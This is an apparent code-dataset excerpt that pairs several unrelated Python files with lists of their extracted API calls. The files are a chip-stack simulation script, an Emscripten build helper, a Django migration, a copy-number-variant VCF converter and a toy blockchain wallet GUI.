torch\n'), ((2328, 2385), 'torch.arange', 'torch.arange', (['seq_length'], {'dtype': 'torch.long', 'device': 'device'}), '(seq_length, dtype=torch.long, device=device)\n', (2340, 2385), False, 'import torch\n'), ((2409, 2465), 'torch.zeros', 'torch.zeros', (['seq_length'], {'dtype': 'torch.long', 'device': 'device'}), '(seq_length, dtype=torch.long, device=device)\n', (2420, 2465), False, 'import torch\n'), ((2702, 2728), 'torch.ones_like', 'torch.ones_like', (['input_ids'], {}), '(input_ids)\n', (2717, 2728), False, 'import torch\n'), ((5303, 5329), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (5315, 5329), False, 'import torch\n'), ((5335, 5361), 'torch.argmax', 
'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (5347, 5361), False, 'import torch\n'), ((5596, 5620), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (5608, 5620), False, 'import torch\n'), ((5626, 5650), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (5638, 5650), False, 'import torch\n'), ((7218, 7238), 'torch.topk', 'torch.topk', (['attrs', 'k'], {}), '(attrs, k)\n', (7228, 7238), False, 'import torch\n'), ((10234, 10304), 'captum.attr.LayerConductance', 'LayerConductance', (['squad_pos_forward_func2', 'model.bert.encoder.layer[i]'], {}), '(squad_pos_forward_func2, model.bert.encoder.layer[i])\n', (10250, 10304), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((11153, 11180), 'numpy.array', 'np.array', (['layer_attrs_start'], {}), '(layer_attrs_start)\n', (11161, 11180), True, 'import numpy as np\n'), ((11416, 11441), 'numpy.array', 'np.array', (['layer_attrs_end'], {}), '(layer_attrs_end)\n', (11424, 11441), True, 'import numpy as np\n'), ((12820, 12833), 'numpy.arange', 'np.arange', (['(12)'], {}), '(12)\n', (12829, 12833), True, 'import numpy as np\n'), ((355, 380), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (378, 380), False, 'import torch\n'), ((1799, 1839), 'torch.tensor', 'torch.tensor', (['[input_ids]'], {'device': 'device'}), '([input_ids], device=device)\n', (1811, 1839), False, 'import torch\n'), ((1841, 1885), 'torch.tensor', 'torch.tensor', (['[ref_input_ids]'], {'device': 'device'}), '([ref_input_ids], device=device)\n', (1853, 1885), False, 'import torch\n'), ((4983, 5007), 'torch.norm', 'torch.norm', (['attributions'], {}), '(attributions)\n', (4993, 5007), False, 'import torch\n'), ((5259, 5296), 'torch.softmax', 'torch.softmax', (['start_scores[0]'], {'dim': '(0)'}), '(start_scores[0], dim=0)\n', (5272, 5296), False, 'import torch\n'), ((5554, 5589), 'torch.softmax', 'torch.softmax', (['end_scores[0]'], {'dim': '(0)'}), 
'(end_scores[0], dim=0)\n', (5567, 5589), False, 'import torch\n'), ((11895, 11939), 'numpy.histogram', 'np.histogram', (['attrs'], {'bins': 'bins', 'density': '(True)'}), '(attrs, bins=bins, density=True)\n', (11907, 11939), True, 'import numpy as np\n'), ((12124, 12154), 'numpy.array', 'np.array', (['layer_attrs_end_dist'], {}), '(layer_attrs_end_dist)\n', (12132, 12154), True, 'import numpy as np\n'), ((4281, 4307), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (4293, 4307), False, 'import torch\n'), ((4310, 4334), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (4322, 4334), False, 'import torch\n')] |
#!/bin/env python
# import the technology's complete stack definition
from example import stack
# in order to decrease simulation times, some metal layers can be removed from
# the stack, allowing more oxide layers to be merged in the next step
# Drop the lower metal layers so their surrounding oxides can be merged.
stack.remove_metal_layer_by_name('PO1')
stack.remove_metal_layer_by_name('ME1')
stack.remove_metal_layer_by_name('ME2')
stack.remove_metal_layer_by_name('ME3')
stack.remove_metal_layer_by_name('ME4')
# The two top metal layers (ME5/ME6) are kept in the simulated stack;
# uncomment to remove them as well.
#stack.remove_metal_layer_by_name('ME5')
#stack.remove_metal_layer_by_name('ME6')
if __name__ == '__main__':
    # Print the standardized stack to example_ME5ME6_std.pdf
    stack.draw('example_ME5ME6_std', pages=3, single_page=True)
# Merge oxide layers to reduce the stack's complexity, decreasing simulation
# times
stack.simplify()
if __name__ == '__main__':
    # Print the simplified stack to example_ME5ME6.pdf
    stack.draw('example_ME5ME6', pages=3, single_page=True)
# Write out a Momentum substrate definition file of the simplified stack
# write_momentum_substrate arguments: filename (without extension),
# infinite ground plane
# NOTE: this might produce bad output when the stack has not been
# simplified before!
stack.write_momentum_substrate('example_ME5ME6', True)
# Write out a Sonnet project that includes the simplified substrate stack
# write_sonnet_technology argument: filename (without extension)
# NOTE: this might produce bad output when the stack has not been
# simplified before!
stack.write_sonnet_technology('example_ME5ME6')
| [
"example.stack.simplify",
"example.stack.write_momentum_substrate",
"example.stack.remove_metal_layer_by_name",
"example.stack.draw",
"example.stack.write_sonnet_technology"
] | [((248, 287), 'example.stack.remove_metal_layer_by_name', 'stack.remove_metal_layer_by_name', (['"""PO1"""'], {}), "('PO1')\n", (280, 287), False, 'from example import stack\n'), ((288, 327), 'example.stack.remove_metal_layer_by_name', 'stack.remove_metal_layer_by_name', (['"""ME1"""'], {}), "('ME1')\n", (320, 327), False, 'from example import stack\n'), ((328, 367), 'example.stack.remove_metal_layer_by_name', 'stack.remove_metal_layer_by_name', (['"""ME2"""'], {}), "('ME2')\n", (360, 367), False, 'from example import stack\n'), ((368, 407), 'example.stack.remove_metal_layer_by_name', 'stack.remove_metal_layer_by_name', (['"""ME3"""'], {}), "('ME3')\n", (400, 407), False, 'from example import stack\n'), ((408, 447), 'example.stack.remove_metal_layer_by_name', 'stack.remove_metal_layer_by_name', (['"""ME4"""'], {}), "('ME4')\n", (440, 447), False, 'from example import stack\n'), ((769, 785), 'example.stack.simplify', 'stack.simplify', ([], {}), '()\n', (783, 785), False, 'from example import stack\n'), ((623, 682), 'example.stack.draw', 'stack.draw', (['"""example_ME5ME6_std"""'], {'pages': '(3)', 'single_page': '(True)'}), "('example_ME5ME6_std', pages=3, single_page=True)\n", (633, 682), False, 'from example import stack\n'), ((873, 928), 'example.stack.draw', 'stack.draw', (['"""example_ME5ME6"""'], {'pages': '(3)', 'single_page': '(True)'}), "('example_ME5ME6', pages=3, single_page=True)\n", (883, 928), False, 'from example import stack\n'), ((1242, 1296), 'example.stack.write_momentum_substrate', 'stack.write_momentum_substrate', (['"""example_ME5ME6"""', '(True)'], {}), "('example_ME5ME6', True)\n", (1272, 1296), False, 'from example import stack\n'), ((1545, 1592), 'example.stack.write_sonnet_technology', 'stack.write_sonnet_technology', (['"""example_ME5ME6"""'], {}), "('example_ME5ME6')\n", (1574, 1592), False, 'from example import stack\n')] |
#!/usr/bin/env python
import os
import stat
from sys import platform
from shutil import rmtree
from subprocess import check_call
def get_platform_type():
if platform == "linux" or platform == "linux2" or platform == "darwin":
return "unix"
elif platform == "win32":
return "windows"
else:
raise ValueError("Unknown platform.")
def resolve_path(rel_path):
return os.path.abspath(os.path.join(os.path.dirname(__file__), rel_path))
def makedirs_silent(root):
try:
os.makedirs(root)
except:
pass
if __name__ == "__main__":
platform_type = get_platform_type()
if platform_type == "unix":
build_dir = resolve_path("bin/web")
elif platform_type == "windows":
build_dir = resolve_path(".\\bin\\web")
makedirs_silent(build_dir)
os.chdir(build_dir)
if platform_type == "unix":
os.system("emcmake cmake ../.. -DEMSCRIPTEN=ON -G \"Unix Makefiles\"")
os.system("make")
elif platform_type == "windows":
os.system("emcmake cmake ../.. -DEMSCRIPTEN=ON -G \"NMake Makefiles\"")
os.system("nmake")
| [
"os.chdir",
"os.system",
"os.path.dirname",
"os.makedirs"
] | [((826, 845), 'os.chdir', 'os.chdir', (['build_dir'], {}), '(build_dir)\n', (834, 845), False, 'import os\n'), ((517, 534), 'os.makedirs', 'os.makedirs', (['root'], {}), '(root)\n', (528, 534), False, 'import os\n'), ((887, 955), 'os.system', 'os.system', (['"""emcmake cmake ../.. -DEMSCRIPTEN=ON -G "Unix Makefiles\\""""'], {}), '(\'emcmake cmake ../.. -DEMSCRIPTEN=ON -G "Unix Makefiles"\')\n', (896, 955), False, 'import os\n'), ((966, 983), 'os.system', 'os.system', (['"""make"""'], {}), "('make')\n", (975, 983), False, 'import os\n'), ((434, 459), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (449, 459), False, 'import os\n'), ((1029, 1098), 'os.system', 'os.system', (['"""emcmake cmake ../.. -DEMSCRIPTEN=ON -G "NMake Makefiles\\""""'], {}), '(\'emcmake cmake ../.. -DEMSCRIPTEN=ON -G "NMake Makefiles"\')\n', (1038, 1098), False, 'import os\n'), ((1109, 1127), 'os.system', 'os.system', (['"""nmake"""'], {}), "('nmake')\n", (1118, 1127), False, 'import os\n')] |
# Generated by Django 3.1.4 on 2021-02-28 15:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('parser_vacancies', '0004_auto_20210207_0052'),
]
operations = [
migrations.CreateModel(
name='Vacancies_count',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('data', models.DateField(null=True, unique=True)),
('added_today', models.IntegerField(null=True)),
('total_vacancies_count', models.IntegerField(null=True)),
],
),
]
| [
"django.db.models.DateField",
"django.db.models.IntegerField"
] | [((348, 402), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'primary_key': '(True)', 'serialize': '(False)'}), '(primary_key=True, serialize=False)\n', (367, 402), False, 'from django.db import migrations, models\n'), ((430, 470), 'django.db.models.DateField', 'models.DateField', ([], {'null': '(True)', 'unique': '(True)'}), '(null=True, unique=True)\n', (446, 470), False, 'from django.db import migrations, models\n'), ((505, 535), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (524, 535), False, 'from django.db import migrations, models\n'), ((580, 610), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (599, 610), False, 'from django.db import migrations, models\n')] |
#! /usr/bin/env python3
import sys
import os
import re
import subprocess
import argparse
import collections
import copy
import decimal
import vcf
import pysam
import pandas as pd
import settings
def cnv_locationtype(region, par1, par2):
chrom = str(region[0]).upper()
start = int(region[1])
stop = int(region[2])
if chrom == "X":
if start >= par1[0] and stop <= par1[1] or start >= par2[0] and stop <= par2[1]: #If CNV is nested in par1 or par2 region
return "chrXpar"
else:
return "chrX"
elif chrom == "Y":
return "chrY"
else:
return "auto"
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('inputcsv', help='Full path to input CSV file')
parser.add_argument('refset', help='Used reference set ID')
parser.add_argument('model', help='Used model ID')
parser.add_argument('gender', choices=['male', 'female'], help='Used gender')
parser.add_argument('sampleid', help='sampleid name to be included in VCF')
parser.add_argument('template', help='Full path to template VCF')
parser.add_argument('runid', help='runid to be added to VCF metadata')
parser.add_argument('--vcf_filename_suffix', help='suffix to be included in VCF filename. Do not include spaces or underscores in suffix')
args = parser.parse_args()
vcf_reader = vcf.Reader(open(args.template, 'r'))
format_keys = vcf_reader.formats.keys()
record = vcf_reader.__next__() # First record (dummy for all other records)
new_record = copy.deepcopy(record)
new_record.samples[0].data = collections.namedtuple('CallData', format_keys) # For single sample VCF only!
format_vals = [record.samples[0].data[vx] for vx in range(len(format_keys))]
format_dict = dict(zip(format_keys, format_vals))
for f in ['GT', 'CCN', 'BF', 'RT', 'CR', 'RS', 'IH', 'CM', 'PD', 'TC']:
format_dict[f] = ""
new_vals = [format_dict[x] for x in format_keys]
new_record.samples[0].data = new_record.samples[0].data._make(new_vals)
df_csv = pd.read_csv(args.inputcsv)
vcf_reader.samples = [args.sampleid] # Change template sampleid in sampleid
"""Add reference and ED reference set metadata."""
vcf_reader.metadata['exomedepth_reference'] = [args.refset]
vcf_reader.metadata['calling_model'] = [args.model]
vcf_reader.metadata['gender_refset'] = [args.gender]
vcf_reader.metadata['reference'] = "file:{}".format(settings.reference_genome)
dx_track_git = subprocess.getoutput("git --git-dir={repo}/.git log --pretty=oneline --decorate -n 1".format(repo=settings.reffile_repo))
vcf_reader.metadata['track_repository'] = ["{0}:{1}".format(settings.reffile_repo, dx_track_git)]
vcf_reader.metadata['runid'] = [args.runid]
"""Open reference genome fasta file"""
reference_fasta = pysam.Fastafile(settings.reference_genome)
if args.vcf_filename_suffix:
vcf_output_filename = "{input}_{vcf_filename_suffix}.vcf".format(input=args.inputcsv[0:-4], vcf_filename_suffix=args.vcf_filename_suffix)
else:
vcf_output_filename = "{input}.vcf".format(input=args.inputcsv[0:-4])
with open(vcf_output_filename, 'w') as vcf_output_file:
vcf_writer = vcf.Writer(vcf_output_file, vcf_reader)
"""Determine percentage DEL/(DEL+DUP) for all calls in VCF."""
dels = 0
dups = 0
for index, row in df_csv.iterrows():
if row['type'] == "deletion":
dels += 1
elif row['type'] == "duplication":
dups += 1
perc_del = "%.2f" % ((float(dels) / (float(dels) + float(dups))) * 100)
total_calls = dels + dups
for index, row in df_csv.iterrows(): # index not used as we only use single sample VCF
"""Change record fields."""
new_record.CHROM = row['chromosome']
new_record.POS = row['start']
new_record.ID = "."
row_type = str(row['type'])
"""Include reference genome base"""
reference_base = reference_fasta.fetch(str(row['chromosome']), int(row['start']-1), int(row['start'])) # 0-based coordinates
new_record.REF = reference_base
"""Write type of call."""
if row_type == "duplication":
new_record.ALT = ["<DUP>"]
new_record.INFO['SVTYPE'] = "DUP"
elif row_type == "deletion":
new_record.ALT = ["<DEL>"]
new_record.INFO['SVTYPE'] = "DEL"
else:
new_record.ALT = ["NaN"]
new_record.INFO['SVTYPE'] = "NaN"
"""Add QUAL and Filter fields """
new_record.QUAL = "1000" # as STRING
new_record.FILTER = "PASS"
"""Determine genotype."""
ratio = row['reads.ratio']
if str(ratio) == "inf": #Rename infinitity values to 99
ratio = 99
"""Consider homozygous genotype only for deletion and with ratio <0.25."""
if row_type.lower() == "deletion" and float(ratio) < float(settings.ratio_threshold_del):
genotype = "1/1"
else: # Always het for duplication, and het for deletion if not < settings.ratio_threshold_del
genotype = "0/1"
"""Determine copy number. Note this will not work for mosaik events"""
par1 = settings.par1
par2 = settings.par2
normal_CN = settings.normal_CN
region = [str(row['chromosome']), int(row['start']), int(row['end'])]
locus_type = cnv_locationtype(region, par1, par2)
normal_copy = float(normal_CN[args.gender][locus_type])
calc_copynumber = normal_copy * float(ratio)
# Estimate true copynumber by rounding to nearest integer
copynumber = int(decimal.Decimal(calc_copynumber).quantize(decimal.Decimal('0'), rounding=decimal.ROUND_HALF_UP))
if args.gender == "female" and locus_type == "chrY":
"""In case CNV is detected on chrY in female, correct for this"""
print("WARNING: {sample} chromosome Y CNV detected (region = {region}) in female, calc_copynumber set to 0 (deletion call) or 1 (duplication call)".format(
sample = str(args.sampleid),
region = str("_".join(str(x) for x in region))
))
# CNV CN is set to 1, could also be >1 (but makes no biological sense)
if ratio > 1:
calc_copynumber = 1
genotype = "1/1"
else: # Assuming CNV is called by noise/mismapping/ on chrY, set CN to 0. Could result in masking contamination of male sample?
calc_copynumber = 0
genotype = "1/1"
else:
if row_type == "deletion" and calc_copynumber > normal_copy or row_type == "duplication" and calc_copynumber < normal_copy:
""" If calc_copynumber is opposite of expected CN for region, i.e. ratio 1.5 for a deletion"""
print("WARNING: {sample} CNV copynumber estimation {copynumber} does not match CNV type {rowtype} for region {region}".format(
sample = str(args.sampleid),
copynumber = str(float(calc_copynumber)),
rowtype = row_type,
region = str("_".join(str(x) for x in region))
))
"""Note: no correction here. should be bugfix in the ExomeDepth code"""
if copynumber == int(normal_copy):
""" Estimated copynumber is similar to copyneutral """
print("WARNING: {sample} true copynumber for region {region} is same as normal CN > set to -1 for deletion, +1 for duplication".format(
sample = str(args.sampleid),
region = str("_".join(str(x) for x in region))
))
if row_type == "deletion": # If deletion correct copynumber with -1
copynumber -= 1
if copynumber == 0:
genotype = "1/1"
elif row_type == "duplication": #If duplication correct copynumber with +1
copynumber += 1
"""Change INFO fields"""
new_record.INFO['END'] = row['end']
new_record.INFO['NTARGETS'] = row['nexons']
new_record.INFO['SVLEN'] = int(row['end']) - int(row['start']) # Input is assumed 0-based
new_record.INFO['CN'] = copynumber
call_conrad = row['Conrad.hg19']
if str(call_conrad) == "nan":
call_conrad = "NaN"
new_record.INFO['cCNV'] = call_conrad
"""Change FORMAT fields"""
for f in ['GT', 'CCN', 'BF', 'RT', 'CR', 'RS', 'IH', 'CM', 'PD', 'TC']:
format_dict[f] = ""
format_dict['GT'] = str(genotype)
format_dict['CCN'] = "%.2f" % (float(calc_copynumber))
format_dict['BF'] = "%.2f" % (float(row['BF']))
format_dict['RT'] = "%.2f" % (float(ratio))
format_dict['CR'] = "%.4f" % (float(row['correlation']))
format_dict['RS'] = row['refsize']
format_dict['IH'] = "NaN" # Inheritence is not build in yet
format_dict['CM'] = args.model
format_dict['PD'] = perc_del
format_dict['TC'] = total_calls
new_vals = [format_dict[x] for x in format_keys]
new_record.samples[0].data = new_record.samples[0].data._make(new_vals) # NOTE: GT must be first in order of metadata!
vcf_writer.write_record(new_record)
vcf_writer.flush()
reference_fasta.close()
| [
"pysam.Fastafile",
"collections.namedtuple",
"pandas.read_csv",
"argparse.ArgumentParser",
"decimal.Decimal",
"copy.deepcopy",
"vcf.Writer"
] | [((665, 690), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (688, 690), False, 'import argparse\n'), ((1564, 1585), 'copy.deepcopy', 'copy.deepcopy', (['record'], {}), '(record)\n', (1577, 1585), False, 'import copy\n'), ((1619, 1666), 'collections.namedtuple', 'collections.namedtuple', (['"""CallData"""', 'format_keys'], {}), "('CallData', format_keys)\n", (1641, 1666), False, 'import collections\n'), ((2080, 2106), 'pandas.read_csv', 'pd.read_csv', (['args.inputcsv'], {}), '(args.inputcsv)\n', (2091, 2106), True, 'import pandas as pd\n'), ((2865, 2907), 'pysam.Fastafile', 'pysam.Fastafile', (['settings.reference_genome'], {}), '(settings.reference_genome)\n', (2880, 2907), False, 'import pysam\n'), ((3258, 3297), 'vcf.Writer', 'vcf.Writer', (['vcf_output_file', 'vcf_reader'], {}), '(vcf_output_file, vcf_reader)\n', (3268, 3297), False, 'import vcf\n'), ((5945, 5965), 'decimal.Decimal', 'decimal.Decimal', (['"""0"""'], {}), "('0')\n", (5960, 5965), False, 'import decimal\n'), ((5903, 5935), 'decimal.Decimal', 'decimal.Decimal', (['calc_copynumber'], {}), '(calc_copynumber)\n', (5918, 5935), False, 'import decimal\n')] |
import binascii
import json
import os
import requests
from time import time
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from Crypto.Hash import RIPEMD160
from Crypto.Signature import pkcs1_15
import Validation
import PySimpleGUI as sg
import hashlib
class Wallet:
unix_time = time()
def __init__(self):
if not os.path.isfile('data/wallet.json'):
self.generate_wallet()
self.nodes = []
# GUI INIT
layout = [[sg.Text('Please enter the address/ip and port of a known node')],
[sg.InputText()],
[sg.Submit(), sg.Cancel()]]
window = sg.Window('Wallet waiting to connect...', layout)
event, values = window.read()
window.close()
# variable inits
self.node = values[0]
self.nodes.append(self.node)
sg.popup("Connecting to ", values[0])
# get the chain from the blockchain node
self.chain = self.get_chain()
#load our wallet file
wallet_file = json.load(open('data/wallet.json', 'r'))
self.private_key = RSA.import_key(wallet_file['private key'])
self.public_key = RSA.import_key(wallet_file['public key'])
self.public_key_hex = wallet_file['public key hex']
self.public_key_hash = wallet_file['public key hash']
# if wallet doesnt exist we'll generate one
if not os.path.exists('data'):
os.makedirs('data')
if not os.path.isfile('data/wallet.json'):
self.generate_wallet()
# wallet file functions
def generate_wallet(self):
private_key = RSA.generate(2048)
private_key_plain = private_key.export_key("PEM")
public_key_plain = private_key.publickey().export_key("PEM")
public_key = private_key.publickey().export_key("DER")
public_key_hex = binascii.hexlify(public_key).decode("utf-8")
public_key_hash = self.calculate_hash(self.calculate_hash(public_key_hex, hash_function="sha256"),
hash_function="ripemd160")
wallet_data = {
'private key': private_key_plain.decode(),
'public key': public_key_plain.decode(),
'public key hex': public_key_hex,
'public key hash': public_key_hash
}
self.write_json(wallet_data, 'w')
def write_json(self, data, mode, filename='data/wallet.json'):
# opens the file in write mode
with open(filename, mode) as file:
block_dict = json.dumps(data, indent=6)
file.write(block_dict)
# hash functions
@staticmethod
def hash(block):
# We must make sure that the Dictionary is Ordered, or we'll have inconsistent hashes
block_string = json.dumps(block, sort_keys=True).encode()
return hashlib.sha256(block_string).hexdigest()
def calculate_hash(self, data, hash_function):
data = bytearray(data, "utf-8")
if hash_function == "sha256":
h = SHA256.new()
h.update(data)
return h.hexdigest()
if hash_function == "ripemd160":
h = RIPEMD160.new()
h.update(data)
return h.hexdigest()
# functions for transactions
def new_transaction(self, recipient, amount, unix_time):
sender = self.public_key_hash
previous_block_hash = self.get_last_block_hash()
trans_data = {
'sender': sender,
'recipient': recipient,
'amount': amount,
'time_submitted': unix_time,
'previous_block_hash': previous_block_hash,
'public_key_hex': self.public_key_hex
}
total_bytes = self.calculate_bytes(trans_data)
fee = self.calculate_fee(total_bytes)
total_amount = amount + fee
transaction = {
'sender': sender,
'recipient': recipient,
'amount': amount,
'fee': fee,
'time_submitted': unix_time,
'previous_block_hash': previous_block_hash,
'public_key_hex': self.public_key_hex
}
hashed_trans = self.hash(transaction)
trans_with_hash = {
'sender': sender,
'recipient': recipient,
'amount': amount,
'fee': fee,
'time_submitted': trans_data['time_submitted'],
'previous_block_hash': previous_block_hash,
'public_key_hex': self.public_key_hex,
'transaction_hash': hashed_trans
}
signed_trans = self.sign(trans_with_hash)
full_transaction = {
'sender': sender,
'recipient': recipient,
'amount': amount,
'fee': fee,
'time_submitted': trans_data['time_submitted'],
'previous_block_hash': previous_block_hash,
'public_key_hex': self.public_key_hex,
'transaction_hash': hashed_trans,
'signature': signed_trans
}
confirmation_window_layout = [
[sg.Text("Are you sure you want to send this Transaction?")],
[[sg.Text("Recipient", justification='left'), sg.Text(recipient, justification='right')]],
[[sg.Text("Amount to send: ", justification='left')], [sg.Text(amount, justification='right')]],
[[sg.Text("Transaction Fee: ", justification='left')], sg.Text(fee, justification='right')],
[[sg.Text("Total Amount: ", justification='left')], sg.Text(total_amount, justification='right')],
[[sg.Button('Confirm')], [sg.Button('Exit')]]
]
window = sg.Window('Python-blockchain Wallet', confirmation_window_layout)
event, values = window.read()
if event in (sg.WIN_CLOSED, 'Exit'):
window.close()
return "cancelled"
if event in 'Confirm':
if self.broadcast_transaction(full_transaction):
self.chain = self.get_chain()
window.close()
return "confirmed"
else:
self.chain = self.get_chain()
window.close()
return False
def broadcast_transaction(self, transaction):
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
for node in self.nodes:
response = requests.post(f'http://{node}/transactions/new', json=transaction, headers=headers)
if response.status_code == 201:
return True
else:
return False
def sign_transaction_data(self, data):
transaction_bytes = json.dumps(data, sort_keys=True).encode('utf-8')
hash_object = SHA256.new(transaction_bytes)
signature = pkcs1_15.new(self.private_key).sign(hash_object)
return signature
def calculate_bytes(self, transaction):
tx_string = json.dumps(transaction)
tx_bytes = tx_string.encode('ascii')
return len(tx_bytes)
def calculate_fee(self, tx_bytes_length):
per_kb_fee = 0.25
sig_hash_bytes = 800
total = tx_bytes_length + sig_hash_bytes
return (total / 1000) * per_kb_fee
def sign(self, data):
signature_hex = binascii.hexlify(self.sign_transaction_data(data)).decode("utf-8")
return signature_hex
# functions for getting blockchain data
def get_balance(self):
chain_balance = Validation.enumerate_funds(self.public_key_hash, self.chain)
if chain_balance > 0:
return chain_balance
if chain_balance == False:
return 0
def get_block_height(self):
for node in self.nodes:
response = requests.get(f'http://{node}/chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
return chain[length - 1]['index']
def get_last_block_hash(self):
for node in self.nodes:
response = requests.get(f'http://{node}/chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
return chain[length - 1]['current_hash']
def get_chain(self):
for node in self.nodes:
response = requests.get(f'http://{node}/chain')
if response.status_code == 200:
chain = response.json()['chain']
return chain
wallet = Wallet()
layout = [
[sg.Text('Welcome to the Python-blockchain wallet')],
[sg.Text('Your blockchain address'), sg.Text(wallet.public_key_hash)],
[sg.Text("Available Funds: "), sg.Text(wallet.get_balance(), key='-BALANCE-')],
[sg.Button('Update Blockchain'), sg.Button('Transaction History')],
[sg.Text("Address: "), sg.InputText(key='-ADDRESS-', size=(20, 20)), sg.Text("Amount: "),
sg.InputText(key='-AMOUNT-', size=(8, 20)), sg.Button('Send Transaction')],
[sg.Button('Exit')]
]
window = sg.Window('Python-blockchain Wallet', layout)
while True:
event, values = window.read()
if event in (sg.WIN_CLOSED, 'Exit'):
break
if event in 'Update Blockchain':
wallet.chain = wallet.get_chain()
wallet.get_balance()
window['-BALANCE-'].update(wallet.get_balance())
if event in 'Transaction History':
window.close()
# code to find relevant transactions in the blockchain pertaining to our wallets address
chain = wallet.get_chain() # get the chain
sent = [] # list for storing sent transactions
received = [] # list for storing received transactions
for block in chain: # iterate through the blockchain
for transaction in block['transactions']:
# code to find received transactions
if transaction['recipient'] == wallet.public_key_hash:
print("received: ", transaction)
received.append(transaction)
# code to find sent transactions
if transaction['sender'] == wallet.public_key_hash:
print("sent: ", transaction)
sent.append(transaction)
else:
continue
sent_json = json.dumps(sent, indent=2)
received_json = json.dumps(received, indent=2)
transaction_window_layout = [
[sg.Text("Sent Transactions:")],
[sg.Multiline(sent_json, size=(100, 25))],
[sg.Text("Received Transactions:")],
[sg.Multiline(received_json, size=(100, 25))],
[sg.Button('Exit')]
]
transaction_window = sg.Window('Transaction History', transaction_window_layout)
events, values = transaction_window.read()
if event in 'Exit':
transaction_window.close()
if event in 'Send Transaction':
time = wallet.unix_time
recipient = values['-ADDRESS-']
amount = float(values['-AMOUNT-'])
if wallet.new_transaction(recipient, amount, time) == "confirmed":
sg.popup(
'Transaction submitted and accepted by network...\nPlease wait for next block confirmation for transaction to confirm')
continue
if wallet.new_transaction(recipient, amount, time) == "cancelled":
sg.popup("Transaction Cancelled")
else:
sg.popup(
'Transaction denied by network\nyou either have unconfirmed transactions in the mempool or insufficient balance.\nPlease try again')
window.close()
| [
"requests.post",
"binascii.hexlify",
"PySimpleGUI.Button",
"Crypto.Hash.RIPEMD160.new",
"Crypto.PublicKey.RSA.import_key",
"os.path.exists",
"json.dumps",
"Crypto.Signature.pkcs1_15.new",
"PySimpleGUI.InputText",
"hashlib.sha256",
"PySimpleGUI.popup",
"Validation.enumerate_funds",
"Crypto.Pu... | [((9040, 9085), 'PySimpleGUI.Window', 'sg.Window', (['"""Python-blockchain Wallet"""', 'layout'], {}), "('Python-blockchain Wallet', layout)\n", (9049, 9085), True, 'import PySimpleGUI as sg\n'), ((301, 307), 'time.time', 'time', ([], {}), '()\n', (305, 307), False, 'from time import time\n'), ((650, 699), 'PySimpleGUI.Window', 'sg.Window', (['"""Wallet waiting to connect..."""', 'layout'], {}), "('Wallet waiting to connect...', layout)\n", (659, 699), True, 'import PySimpleGUI as sg\n'), ((864, 901), 'PySimpleGUI.popup', 'sg.popup', (['"""Connecting to """', 'values[0]'], {}), "('Connecting to ', values[0])\n", (872, 901), True, 'import PySimpleGUI as sg\n'), ((1111, 1153), 'Crypto.PublicKey.RSA.import_key', 'RSA.import_key', (["wallet_file['private key']"], {}), "(wallet_file['private key'])\n", (1125, 1153), False, 'from Crypto.PublicKey import RSA\n'), ((1180, 1221), 'Crypto.PublicKey.RSA.import_key', 'RSA.import_key', (["wallet_file['public key']"], {}), "(wallet_file['public key'])\n", (1194, 1221), False, 'from Crypto.PublicKey import RSA\n'), ((1639, 1657), 'Crypto.PublicKey.RSA.generate', 'RSA.generate', (['(2048)'], {}), '(2048)\n', (1651, 1657), False, 'from Crypto.PublicKey import RSA\n'), ((5663, 5728), 'PySimpleGUI.Window', 'sg.Window', (['"""Python-blockchain Wallet"""', 'confirmation_window_layout'], {}), "('Python-blockchain Wallet', confirmation_window_layout)\n", (5672, 5728), True, 'import PySimpleGUI as sg\n'), ((6735, 6764), 'Crypto.Hash.SHA256.new', 'SHA256.new', (['transaction_bytes'], {}), '(transaction_bytes)\n', (6745, 6764), False, 'from Crypto.Hash import SHA256\n'), ((6924, 6947), 'json.dumps', 'json.dumps', (['transaction'], {}), '(transaction)\n', (6934, 6947), False, 'import json\n'), ((7461, 7521), 'Validation.enumerate_funds', 'Validation.enumerate_funds', (['self.public_key_hash', 'self.chain'], {}), '(self.public_key_hash, self.chain)\n', (7487, 7521), False, 'import Validation\n'), ((8545, 8595), 
'PySimpleGUI.Text', 'sg.Text', (['"""Welcome to the Python-blockchain wallet"""'], {}), "('Welcome to the Python-blockchain wallet')\n", (8552, 8595), True, 'import PySimpleGUI as sg\n'), ((8603, 8637), 'PySimpleGUI.Text', 'sg.Text', (['"""Your blockchain address"""'], {}), "('Your blockchain address')\n", (8610, 8637), True, 'import PySimpleGUI as sg\n'), ((8639, 8670), 'PySimpleGUI.Text', 'sg.Text', (['wallet.public_key_hash'], {}), '(wallet.public_key_hash)\n', (8646, 8670), True, 'import PySimpleGUI as sg\n'), ((8678, 8706), 'PySimpleGUI.Text', 'sg.Text', (['"""Available Funds: """'], {}), "('Available Funds: ')\n", (8685, 8706), True, 'import PySimpleGUI as sg\n'), ((8762, 8792), 'PySimpleGUI.Button', 'sg.Button', (['"""Update Blockchain"""'], {}), "('Update Blockchain')\n", (8771, 8792), True, 'import PySimpleGUI as sg\n'), ((8794, 8826), 'PySimpleGUI.Button', 'sg.Button', (['"""Transaction History"""'], {}), "('Transaction History')\n", (8803, 8826), True, 'import PySimpleGUI as sg\n'), ((8834, 8854), 'PySimpleGUI.Text', 'sg.Text', (['"""Address: """'], {}), "('Address: ')\n", (8841, 8854), True, 